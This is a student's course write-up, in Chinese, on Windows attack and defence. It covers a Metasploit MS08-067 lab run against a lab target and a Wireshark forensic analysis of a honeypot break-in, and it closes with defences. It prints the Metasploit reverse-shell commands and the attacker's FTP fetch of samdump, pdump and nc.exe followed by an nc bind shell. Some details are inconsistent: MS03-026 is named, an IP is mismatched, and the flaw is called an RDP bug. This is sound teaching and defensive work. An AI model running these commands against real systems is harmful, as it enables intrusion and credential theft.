20199138 2019-2020-2 《网络攻防实践》第7周作业
| 这个作业属于哪个课程 | https://edu.cnblogs.com/campus/besti/19attackdefense |
|---|---|
| 这个作业的要求在哪里 | https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10612 |
| 本次作业的目标是 | 学习Windows操作系统安全攻防 |
| 作业正文 | 见下文 |
1.实践内容
1.1 Windows操作系统基本框架
分为运行于处理器特权模式的操作系统内核,以及运行在处理器非特权模式的用户空间代码。
-
内核模式:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。
-
用户模式:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。
-
Windows进程和线程管理机制:进程在Windows系统中被视为可执行程序运行时的容器。线程在Windows系统中作为指令执行的具体载体。
-
Windows内存管理机制:虚拟内存分为系统核心内存区间和用户内存区间。用户态程序无法直接访问前者。
-
Windows文件管理机制:采用NTFS文件系统,可执行文件采用PE格式。
-
Windows注册表管理机制:是系统全局配置、用户和应用软件配置信息的存储仓库。
-
Windows网络机制:网卡硬件设备驱动程序、NDIS库及miniport驱动程序、TDI、网络API DLL和TDI客户端、网络应用程序与服务进程。
1.2 Windows操作系统的安全体系结构与机制
- Windows安全体系结构:位于内核的SRM安全引用监控器和位于用户态的LSASS安全服务,与Winlogon/Netlogon及Eventlog等服务一起,实现了对主体用户的身份认证机制、对所有资源对象的访问控制机制,以及对访问的安全审计机制。
- Windows身份认证机制:Windows设置账户作为安全主体运行程序代码的执行环境,账户权限的根本作用是限制账户内运行程序对系统资源对象的访问。Windows支持本地身份认证和网络身份认证两种方式。
- Windows授权与访问控制机制:基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同实施,由SRM作为安全主体访问对象资源时的中介,根据设定的访问控制列表进行授权访问。
- Windows安全审计机制:系统审计策略在本地安全策略中由系统管理员定义,来确定系统对那些实践进行记录。
- 其他安全机制:Windows安全中心,IPsec加载和验证机制,EPS加密文件系统,文件保护机制,捆绑的IE浏览器所提供的隐私保护和浏览器安全保护机制等。
1.3 Windows远程安全攻防技术
包括远程口令猜测与破解攻击、Windows网络服务攻击、Windows客户端和用户攻击。
(1) 针对特定目标的渗透测试攻击过程:
- 漏洞扫描测试:对目标系统的扫描测试,从而发现系统中是否存在已知的安全漏洞。
- 查找漏洞的渗透代码:根据安全漏洞信息库中的索引信息,在安全社区中找到针对已经扫描出的安全漏洞的攻击代码资源。
- 实施渗透测试:在找到渗透代码之后可以实施渗透攻击。但是否成功取决于代码和目标的环境是否匹配。
- Metasploit渗透测试: metasploit包含利用安全漏洞的exploits模块、负责扫描和查点的auxiliary模块、负责在目标系统植入shellcode(利用软件漏洞而执行的代码)的payload模块、可以躲避检测encoders模块、对攻击负载进行填充的Nops等模块及多种接口。
(2) 远程口令猜测与破解攻击:
- 远程口令猜测:经常遭受该类攻击的网络服务SMB协议、WMI服务、TS远程桌面终端服务、MS SQL数据库服务、SharePoint等。
- 远程口令字交换通讯窃听与破解:windows在对网络用户身份进行验证的时候需要在网上交换信息,因而可以被窃听网络口令交换通信实施破解。
- 远程渗透攻击防范措施:应该尽可能快的更新软件的补丁;对安全漏洞被公布的这段时间,应暂时禁用存在网络服务的访问,来避免被攻击;通过漏洞扫描软件对已知的漏洞及时修补。
1.4 Windows本地安全攻防技术
-
Windows本地提权:
攻击者获得系统上受限用户权限后,就会着眼于获得终极特权,主要途径有DDL注入和破解本地程序漏洞。 -
Windows敏感信息窃取:
windows系统口令字密文提取技术、windows系统口令字破解技术、用户敏感信息窃取等。
防范措施:选择高强度、高防御的口令,使用更安全的加密明文算法,安全配置策略。 -
Windows消踪灭迹:
通过关闭审计功能、清理事件日志来掩盖入侵痕迹。
防范措施:事先设置系统审计和网络服务审计,日志记录在不可擦除的CDROM上。 -
Windows远程控制与后门程序:
使用命令行远程控制工具、图形化远程控制工具等在系统植入远程控制和后门程序,维持对主机的持久控制。
防范措施:后门检测软件、杀软、rootkitrerealer、IcSword。
2.实践过程
2.1 动手实践:Metasploit Windows Attack
任务:使用Metasploit软件进行Windows远程渗透攻击实验,使用Windows Attacker/BT4攻击机尝试对Windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机访问权。
| 主机 | IP地址 |
|---|---|
| Kali攻击机 | 193.168.200.2 |
| Win2KServer靶机 | 193.168.200.124 |
- 在kali中输入msfconsole进入Metasploit
- 查看漏洞ms08_067详细信息,输入search ms08_067;查看可攻击载荷,输入show payloads
- 使用MS03-026作为我们攻击的目标漏洞,输入use exploit/windows/smb/ms08_067_netapi
设置打开反向连接的载荷,输入set PAYLOAD generic/shell_reverse_tcp
载荷分为single、stager、stage三种,payload是用来实际做什么事的代码,exploit是传送系统
设置Kali攻击机IP地址,输入set LHOST 192.168.200.2,设置Win2K靶机IP地址,输入set RHOST 192.168.200.124
- 开始攻击,输入exploit
- 输入meterpreter,返回之后表示攻击成功,运行shell指令,进入到靶机的系统命令行界面,输入ipconfig显示靶机的操作系统和IP配置,渗透攻击成功;
5.验证,回到根目录创建文件ABC,可看到根目录创建文件ABC成功
2.2 取证分析实践:解码一次成功的NT系统破解攻击
来自213.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106(主机名为:lab.wiretrip.net),提取并分析攻击的全部过程。
一、攻击者使用了什么破解工具进行攻击?
- 使用wireshark打开log文件,对数据进行筛,根据题目输入ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106,发现攻击者一开始进行了HTTP访问。
- 继续向下找,发现编号117,攻击者打开了系统启动文件boot.ini,且有许多%C0%AF字符,是/的Unicode编码,可能是Unicode漏洞攻击。
- 继续观察发现编号130和编号140中含有msadc,这是进行探测的过程,随后在编号149,追踪tcp流,发现是SQL注入攻击(select * from customers where)。
执行的命令是cmd /c echo werd >> c:\fun。可确定是基于MSADCS RDS的漏洞攻击。
二、攻击者如何使用这个破解工具进入并控制了系统?
在Wireshark中输入ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && http.request.method == "POST"进行过滤,依次追踪TCP流,整理出以下指令。
cmd /c echo hacker 2000 >> ftpcom” ) ;
cmd /c echo get samdump .dll >> ftpcom” ) ;
cmd /c echo get pdump .exe >> ftpcom” ) ;
cmd /c echo get nc.exe>>ftpcom” ) |;
cmd /c echo quit>>ftpcom” );
cmd /c ftp – s : ftpcom- n www.nether.net” )
编号179追踪TCP流,看到cmd /c echo user johna2k > ftpcom指令,攻击者创建了一个ftpcom脚本
编号299追踪TCP流,攻击者尝试连接ftp服务器未成功
编号1106追踪TCP流,成功连接ftp
编号1224追踪TCP流,攻击者输入命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口,且获得了访问权限。至此,攻击者已经进入系统并且获得访问权。
三、当攻击者获得系统的访问权后做了什么?
- 输入tcp.port == 6969,并追踪TCP流发现攻击者的行为
- 攻击者尝试信息收集,net session(列出会话),但是没有权限,之后返回了主机列表
攻击者发了一个echo消息到C盘根目录文件README.NOW.Hax0r
攻击者发尝试net group查看组用户,net localgroup查看本地组用户,net group domain admins,但均失败
攻击者开始寻找msadc目录,并执行pdump破解口令密文,均失败
攻击者开始删除samdump和pdump
……
攻击者离开
四、我们如何防止这样的攻击?
- 禁用用不着的 RDS 等服务。
- 防火墙封禁网络内部服务器发起的连接。
- 为 web server 在单独的文件卷上设置虚拟根目录。
- 使用NTFS文件系统,减少使用不提供安全功能的FAT 。
五、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
是的,攻击者留下的称赞
2.3 团队对抗实践:Windows系统远程渗透攻击与分析
任务:
攻击方:使用metasploit,选择metasploitable中的漏洞进行渗透攻击,获得控制权;
防御方:使用tcpdump/wireshark/snort监听获得网络攻击的数据包文件,并结合wireshark/snort分析攻击过程,获取攻击者IP地址、目标IP和端口、攻击发起时间、攻击利用漏洞、攻击使用shellcode,以及攻击成功之后在本地执行的命令输入等信息。
与实验一内容一样,不再赘述,只结合wireshark进行分析
开启wireshark进行监听,输入exploit进行攻击。
ip.addr == 192.168.200.124 && ip.addr == 192.168.200.2
可得到以下结果:
源地址192.168.200.2;目标地址192.168.200.124;
源端口4444;目标端口445;
攻击发起时间:从第一个ARP请求开始;
攻击利用的漏洞:SMB网络服务的漏洞,从RemoteActivation中可以看出是利用的RDP漏洞
3.学习中遇到的问题及解决
- 问题1:刚开始尝试实践二NT系统破解攻击,感觉有些晦涩难懂
- 问题1解决方案:看书并参考同学博客
4.实践总结
事情太多了,下次要早点做实验写作业!